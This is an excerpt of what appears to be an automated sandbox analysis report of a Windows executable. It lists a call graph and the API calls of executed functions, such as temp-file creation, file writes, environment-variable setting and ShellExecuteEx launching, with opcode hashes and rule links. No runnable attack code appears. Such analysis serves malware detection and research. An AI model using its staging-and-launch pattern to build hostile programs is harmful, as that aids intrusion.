9847 406408 _wcsdup 9845->9847 9848 40e180 TlsGetValue 9846->9848 9847->9846 9851 406420 9848->9851 9850 40639c wcsncpy 9849->9850 9853 403b28 9849->9853 9850->9849 9852 406428 _wcsdup 9851->9852 9856 406438 9851->9856 9852->9856 9853->8914 9854 40e200 2 API calls 9855 4064c0 9854->9855 9857 406512 wcsncpy 9855->9857 9858 4064c6 9855->9858 9861 40652d 9855->9861 9856->9854 9857->9861 9859 406584 9858->9859 9860 40657b ??3@YAXPAX 9858->9860 9862 406597 9859->9862 9863 40658b ??3@YAXPAX 9859->9863 9860->9859 9861->9858 9865 4065c5 wcsncpy 9861->9865 9862->9853 9864 40659e ??3@YAXPAX 9862->9864 9863->9862 9864->9853 9865->9861 9867 40aa60 14 API calls 9866->9867 9868 40243f 9867->9868 9868->9700 9869 40af20 9868->9869 9870 40d3f9 2 API calls 9869->9870 9871 40af2f 9870->9871 9872 40af43 9871->9872 9875 40ae20 9871->9875 9872->9698 9874 40af40 9874->9698 9876 40af14 9875->9876 9877 40ae34 9875->9877 9876->9874 9877->9876 9878 40ae48 9877->9878 9879 40aead 9877->9879 9880 40ae80 9878->9880 9881 40ae58 9878->9881 9893 40b0d0 WideCharToMultiByte 9879->9893 9880->9880 9884 40ae8b WriteFile 9880->9884 9888 40afc0 4 API calls 9881->9888 9883 40aec7 9885 40af0b 9883->9885 9886 40aed7 9883->9886 9887 40aee8 WriteFile 9883->9887 9884->9874 9885->9874 9889 40afc0 4 API calls 9886->9889 9890 40aefc HeapFree 9887->9890 9891 40ae7a 9888->9891 9892 40aee2 9889->9892 9890->9885 9891->9874 9892->9890 9894 40b0f5 RtlAllocateHeap 9893->9894 9895 40b12e 9893->9895 9896 40b129 9894->9896 9897 40b10c WideCharToMultiByte 9894->9897 9895->9883 9896->9883 9897->9896 9960->9046 9961->9050 9962->9045 9963->9049 9964->9053 10185->7852 10186->7854 10187->7856 10188->7858 10189->7862 10190->7868 10191->7870 10192->7872 10193->7874 10194->7878 10195->7886 10196->7892 10197->7894 10198->7901 10199->7903 10200->7905 10201->7907 10202->7911 10203->7917 10204->7919 10205->7921 10206->7923 10207->7927 10208->7933 10209->7939 10210->7945 10211->7947 10212->7953 10213->7959 10435 406229 10436 406230 10435->10436 10436->10436 10439 40e350 TlsGetValue 10436->10439 10438 406255 10439->10438 10475 401f3b 10476 40df60 21 API calls 10475->10476 10477 401f43 10476->10477 10498 40de20 GetLastError TlsGetValue SetLastError 10477->10498 10479 401f49 10499 40de20 GetLastError TlsGetValue SetLastError 10479->10499 10481 401f5a 10482 40dfc0 3 API calls 10481->10482 10483 401f62 10482->10483 10500 40de20 GetLastError TlsGetValue SetLastError 10483->10500 10485 401f68 10501 40de20 GetLastError TlsGetValue SetLastError 10485->10501 10487 401f70 10502 409ab0 10487->10502 10491 401f7d 10506 405182 TlsGetValue 10491->10506 10493 401f88 10494 408dc7 18 API calls 10493->10494 10495 401f91 10494->10495 10496 4051a0 3 API calls 10495->10496 10497 401f96 10496->10497 10497->10497 10498->10479 10499->10481 10500->10485 10501->10487 10507 409a40 10502->10507 10505 40e020 TlsGetValue 10505->10491 10506->10493 10508 409a50 10507->10508 10508->10508 10509 40e200 2 API calls 10508->10509 10510 401f77 10509->10510 10510->10505 10225 4011bf 10252 405379 RtlEnterCriticalSection 10225->10252 10227 4011c4 10238 4098f0 SetUnhandledExceptionFilter 10227->10238 10229 4011c9 10239 40a655 10229->10239 10235 4011d8 10251 409ad0 HeapDestroy 10235->10251 10237 4011dd 10238->10229 10240 4011ce 10239->10240 10241 40a65e 10239->10241 10243 40aa30 10240->10243 10242 40d995 2 API calls 10241->10242 10242->10240 10244 40d995 2 API calls 10243->10244 10245 4011d3 10244->10245 10246 40d264 10245->10246 10247 40d271 10246->10247 10248 40d272 10246->10248 10247->10235 10249 40d287 10248->10249 10250 40d27b TlsFree 10248->10250 10249->10235 10250->10249 10251->10237 10253 4053b2 RtlLeaveCriticalSection 10252->10253 10254 40538f 10252->10254 10253->10227 10255 405390 CloseHandle 10254->10255 10256 4053b1 10254->10256 10255->10254 10256->10253

                                                                              Executed Functions

                                                                              Function 0040A6F6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000000E), ref: 0040E20C
                                                                                • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 0040E267
                                                                              • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,?,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A70D
                                                                              • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,?,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A71A
                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A72C
                                                                              • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,?,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A739
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A73E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                                              • API String ID: 1993255246-2943376620
                                                                              • Opcode ID: 7b42a2a4bda81c2a557b82b464e46efdc551e2bdda77aae8c4b8834907019da6
                                                                              • Instruction ID: 764606bb569eff9aa2a854e4b0558f5753b22c8873abefb13c435e0df7790d1f
                                                                              • Opcode Fuzzy Hash: 7b42a2a4bda81c2a557b82b464e46efdc551e2bdda77aae8c4b8834907019da6
                                                                              • Instruction Fuzzy Hash: B4F0E9322012147FC2102BB6AC4CEEB3E6CDF95755701443AF904E2251DB69CC20C2BD
                                                                              Function 00401000 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040100F
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                                                • Part of subcall function 0040DDD0: HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DDDC
                                                                                • Part of subcall function 0040DDD0: TlsAlloc.KERNEL32 ref: 0040DDE7
                                                                                • Part of subcall function 00409AE0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9
                                                                                • Part of subcall function 00409609: RtlInitializeCriticalSection.NTDLL(004176C8), ref: 00409631
                                                                                • Part of subcall function 00408D8E: memset.MSVCRT ref: 00408D9B
                                                                                • Part of subcall function 00408D8E: CoInitialize.OLE32(00000000), ref: 00408DBD
                                                                                • Part of subcall function 004053BB: RtlInitializeCriticalSection.NTDLL(004176A0), ref: 004053C0
                                                                              • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                                                                • Part of subcall function 00409D80: RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409D9F
                                                                                • Part of subcall function 00409D80: RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409DC5
                                                                                • Part of subcall function 00409D80: RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409E22
                                                                                • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A3B8
                                                                                • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3D1
                                                                                • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3DB
                                                                                • Part of subcall function 0040A2E8: RtlAllocateHeap.NTDLL(00000000,00000034), ref: 0040A2FB
                                                                                • Part of subcall function 0040A2E8: RtlAllocateHeap.NTDLL(FFFFFFF5,00000008), ref: 0040A310
                                                                                • Part of subcall function 0040DB6A: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040DB9A
                                                                                • Part of subcall function 0040DB6A: memset.MSVCRT ref: 0040DBD5
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                                • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401BCD
                                                                                • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                                                                • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 00401BF2
                                                                              • ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 004011A5
                                                                              • HeapDestroy.KERNEL32(00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 004011B5
                                                                              • ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 004011BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Allocate$Free$CreateInitializememset$CriticalErrorExitHandleLastLibraryProcessSectionValue$AllocDestroyEnumLoadModuleResourceTypes
                                                                              • String ID:
                                                                              • API String ID: 784591235-0
                                                                              • Opcode ID: 1d7ba25bdac2cc46eb0f483c85253156cba33636e365104d8824d09eec5e1d3a
                                                                              • Instruction ID: 054f58a703c2077171097cea621e0c228d2d39f1c558e4fc4fd495567313132e
                                                                              • Opcode Fuzzy Hash: 1d7ba25bdac2cc46eb0f483c85253156cba33636e365104d8824d09eec5e1d3a
                                                                              • Instruction Fuzzy Hash: 33311C30A84700A9E610B7F29C43FAE3A65AF1874DF11803FB649791E3DEBD55448A6F
                                                                              Function 0040195B Relevance: 9.2, APIs: 6, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                              • GetTempFileNameW.KERNEL32(00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,?,004043B9,00000001,00000000), ref: 00401A2A
                                                                              • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401A7F
                                                                              • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 00401AD4
                                                                              • PathAddBackslashW.SHLWAPI(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 00401ADF
                                                                              • PathRenameExtensionW.SHLWAPI(00000000,00000000,00000000,00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000), ref: 00401B1E
                                                                              • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020), ref: 00401B38
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                                • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0040DEBC
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                                                              • String ID:
                                                                              • API String ID: 368575804-0
                                                                              • Opcode ID: 1ba5b1041860197bcb70b5f8865f6e3a244e24124e7517cd294dd1039848c71c
                                                                              • Instruction ID: da94853b8b5bd26d1bd5120d1b9c906e5f4cf8f619d60ffb6644f8987c096960
                                                                              • Opcode Fuzzy Hash: 1ba5b1041860197bcb70b5f8865f6e3a244e24124e7517cd294dd1039848c71c
                                                                              • Instruction Fuzzy Hash: 6651EEB59047006ED601BBB2DD42E7F7B7EEB98318F00883FB540690E2C63D9C559A6D
                                                                              Function 0040AA60 Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AAD1
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AB12
                                                                              • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AB5C
                                                                              • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,?,00000000), ref: 0040AB7E
                                                                              • RtlAllocateHeap.NTDLL(00000000,00001000,?), ref: 0040ABB7
                                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: File$Create$AllocateHeapPointer
                                                                              • String ID:
                                                                              • API String ID: 1439325152-0
                                                                              • Opcode ID: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
                                                                              • Instruction ID: 35cb0034da6faa60fecaa9fe6ab12df6337e8788845343623408397181d4bc5b
                                                                              • Opcode Fuzzy Hash: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
                                                                              • Instruction Fuzzy Hash: E451B171204300ABE3218E28DC44B57BAE5EB44764F614A3AFA51A62E0D779EC55CB1E
                                                                              Function 0040D7B9 Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(0041761C), ref: 0040D7FA
                                                                              • RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0040D831
                                                                              • RtlLeaveCriticalSection.NTDLL(0041761C), ref: 0040D88A
                                                                              • RtlAllocateHeap.NTDLL(00000000,00000038,00000000), ref: 0040D89B
                                                                              • RtlInitializeCriticalSection.NTDLL(00000020), ref: 0040D8D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
                                                                              • String ID:
                                                                              • API String ID: 2823868979-0
                                                                              • Opcode ID: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
                                                                              • Instruction ID: 1c1621ef8b81eb37d3c39fa836f306ed5b79470d652240547c7f2301dbf87725
                                                                              • Opcode Fuzzy Hash: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
                                                                              • Instruction Fuzzy Hash: DE31A2B2D007019BC3209F99D844A57BBF4FB44760B15C53EE465A7390D738E908CB98
                                                                              Function 00403DF3 Relevance: 6.6, APIs: 4, Instructions: 640COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0040DEBC
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,00000000), ref: 004042FB
                                                                              • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                                                                • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(?,?,00002710), ref: 00402C34
                                                                                • Part of subcall function 0040E020: TlsGetValue.KERNEL32(0000000E), ref: 0040E02A
                                                                                • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                • Part of subcall function 00409860: SetEnvironmentVariableW.KERNEL32(?,?,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000), ref: 00409879
                                                                                • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401E8A
                                                                              • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000), ref: 004044A7
                                                                              • PathQuoteSpacesW.SHLWAPI(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000), ref: 004044E1
                                                                                • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054AB
                                                                                • Part of subcall function 00405492: RtlEnterCriticalSection.NTDLL(004176A0), ref: 004054BD
                                                                                • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054D4
                                                                                • Part of subcall function 00405492: CloseHandle.KERNEL32(?,?,?,?,?,00402E2C,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054E0
                                                                                • Part of subcall function 00405492: RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405523
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                                                              • String ID:
                                                                              • API String ID: 1881381519-0
                                                                              • Opcode ID: d8c64dcd585f1b5e06573cdc086111ceee2949358ebd607d45979ef17bbfe3ff
                                                                              • Instruction ID: 95625e34f548e5502c8bb68b533fb61ff434c3c21d69ae2a44b2ba18bfe99ca0
                                                                              • Opcode Fuzzy Hash: d8c64dcd585f1b5e06573cdc086111ceee2949358ebd607d45979ef17bbfe3ff
                                                                              • Instruction Fuzzy Hash: 1822E9B5914700AED200BBF1DD8197F77BDEB98718F10D83FB540AA192CA3CD8465B69
                                                                              Function 00402022 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CodeExecuteExitProcessShell
                                                                              • String ID: open
                                                                              • API String ID: 1016612177-2758837156
                                                                              • Opcode ID: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
                                                                              • Instruction ID: f63886f370766692049a8ab09fc70fe74b01992a8596c344147a8d3c31b217da
                                                                              • Opcode Fuzzy Hash: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
                                                                              • Instruction Fuzzy Hash: E9218971008309AFD700EF64C845A9FBBE9EF44308F10882EF198A6291DB79D905DB96
                                                                              Function 00401B8F Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 00409638: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
                                                                                • Part of subcall function 00409638: wcscmp.MSVCRT ref: 00409662
                                                                                • Part of subcall function 00409638: memmove.MSVCRT ref: 0040967A
                                                                                • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401BCD
                                                                              • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                                                              • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 00401BF2
                                                                                • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                                              • String ID:
                                                                              • API String ID: 983379767-0
                                                                              • Opcode ID: f99985e6a0fadfcf50563e483824b6179ac324fb850170194da487b215f581e1
                                                                              • Instruction ID: 3462f3606e8cbb1e1a4d79c74de0940f317b4d1ea5cf6404f74aab9d4bf66b3f
                                                                              • Opcode Fuzzy Hash: f99985e6a0fadfcf50563e483824b6179ac324fb850170194da487b215f581e1
                                                                              • Instruction Fuzzy Hash: 4251F7B59047006AE6007BF2DD86E7F66AEDBD4718F10883FB5407D0D2CA3C8C5966AD
                                                                              Function 0040AFC0 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040AFF8
                                                                              • memcpy.MSVCRT ref: 0040B032
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointermemcpy
                                                                              • String ID:
                                                                              • API String ID: 1104741977-0
                                                                              • Opcode ID: fafebd8826c96d2b2db8682312df0f91d37c55b82f074fe812bb41d959714341
                                                                              • Instruction ID: ace082a42c8b9570e8fa48c2980c6e4681abbcae92d9a1b023345ff456592002
                                                                              • Opcode Fuzzy Hash: fafebd8826c96d2b2db8682312df0f91d37c55b82f074fe812bb41d959714341
                                                                              • Instruction Fuzzy Hash: 4B313A392007009FC220DF29D844E5BB7E5EFD8714F04882EE59A97750D335E919CFA6
                                                                              Function 0040DE60 Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0040DEBC
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap$Value
                                                                              • String ID:
                                                                              • API String ID: 2497967046-0
                                                                              • Opcode ID: 12a9e260dbc5041e106ecfc4060b29adff0858ebc3c8cdb12623e96d50297f69
                                                                              • Instruction ID: e6d91f3b09335801e5746b2964150cf116aaa33277573073d0b775b4e860d931
                                                                              • Opcode Fuzzy Hash: 12a9e260dbc5041e106ecfc4060b29adff0858ebc3c8cdb12623e96d50297f69
                                                                              • Instruction Fuzzy Hash: E511B974A00208EFCB04DF98D894EAABBB6FF88315F10C559E9099B354D735AA41CB94
                                                                              Function 0040A665 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
